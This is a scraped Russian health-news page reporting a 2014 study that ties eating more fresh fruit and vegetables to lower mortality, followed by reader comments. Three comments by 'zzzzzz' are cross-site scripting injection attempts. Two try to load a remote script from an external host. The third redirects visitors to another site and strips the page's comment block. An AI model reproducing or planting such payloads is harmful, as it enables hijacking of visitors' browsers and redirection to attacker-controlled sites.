Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кто целый день грызет ово...  >>  Кто целый день грызет овощи и фрукты, тот будет жить в 2 раза дольше!
 
Обратная связь
 

Кто целый день грызет овощи и фрукты, тот будет жить в 2 раза дольше!

Размер шрифта
21 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Давно известно, что включение свежих овощей и фруктов в рацион полезно для здоровья, однако ученым удалось выяснить, что такая диета также может значительно снизить риск умереть от рака и заболеваний сердца.

Кто целый день грызет овощи и фрукты, тот будет жить в 2 раза дольше!

Ученые с 2001 по 2013 год проанализировали рацион питания более чем 65 000 англичан. Они обнаружили, что те люди, которые употребляли семь стандартных порций свежих фруктов и овощей в день, имели на 42% более низкий риск смерти (в любом возрасте), чем те, кто ел менее одной порции ежедневно. 

При употреблении от пяти до семи порций овощей и фруктов риск смерти снижался на 36%, на 29% – при употреблении от трех до пяти порций. Эти данные были опубликованы в Journal of Epidemiology and Community Health. Ученым впервые удалось показать связь между диетой с высоким содержанием фруктов и овощей и снижением риска смерти.

Исследователи утверждают, что, согласно полученным ими данным, употребление семи и более стандартных порций фруктов и овощей в день снижает риск смерти от рака на 25% и от заболеваний сердца на 31%.

Также стоит отметить, что овощи оказывают более сильный положительный эффект на здоровье чем фрукты. Ежедневная порция свежих овощей снижает общий риск смерти на 16%, порция салата – на 13%, а порция фруктов – всего на 4%. 

«Все мы знаем, что свежие фрукты и овощи очень полезны, но их положительное влияние оказалось куда большим, чем мы ожидали», – рассказывает Оинлола Ойебоуд из отделения эпидемиологии и общественного здоровья Лондонского Университета. «Овощи оказывают более выраженный эффект, нежели фрукты, однако и польза фруктов очень высока. Если вам нравится хрустеть морковкой и перекусывать овощами – это отлично, но если вам хочется чего-нибудь послаще, банан – это тоже хороший выбор», – добавляет Ойебоуд.

Фруктовые соки, в отличие от свежих фруктов, не приносят особой пользы. А консервированные и замороженные фрукты даже увеличивают риск смерти, утверждают исследователи. «В большинстве фруктовых консервов содержится очень много сахара, причем дешевые консервы обычно содержат сироп, а не натуральный фруктовый сок», – объясняет Ойебоуд. «Вредное влияние, которое оказывает сахар, может перевесить всю пользу от таких продуктов».

Так что можете с уверенностью покупать больше свежих овощей и фруктов – они не только помогут вам сохранить стройную фигуру, но и принесут несомненную пользу вашему здоровью.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 октября 2014 в 22:59

Цитировать   |   Пожаловаться

Почему в статье написано, что замороженные фрукты увеличивают риск смерти?????? Консервированные это понятно, а вот замороженные!!!! Поражена!!!!!  Поясните пожалуйста!

Гость 21 октября 2014 в 22:59
Консервированные это понятно, а вот замороженные!!
 Гость, поскольку в статье в качестве негативного фактора приводится большое количество сахара при консервировании, то, вероятно, авторы имели ввиду замораживание с добавлением сахара соли, и прочих добавок. 

3 - Гость

22 октября 2014 в 16:45

Цитировать   |   Пожаловаться

Просьба!!!!Пусть пишут точно и ясно, чтобы мы простые обыватели не имеющие отношения к медицине не додумывали " что они имеют ввиду"!!!

4 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Худшая еда для беременной   Еда может заставить вас светится от красоты! Что есть?!   Обычный фрукт продлевает жизнь на 30%! Какой же?   Сколько мы едим?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
5 способов похудеть без диеты
Лучшая еда для ваших кишок
Как бросить курить

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.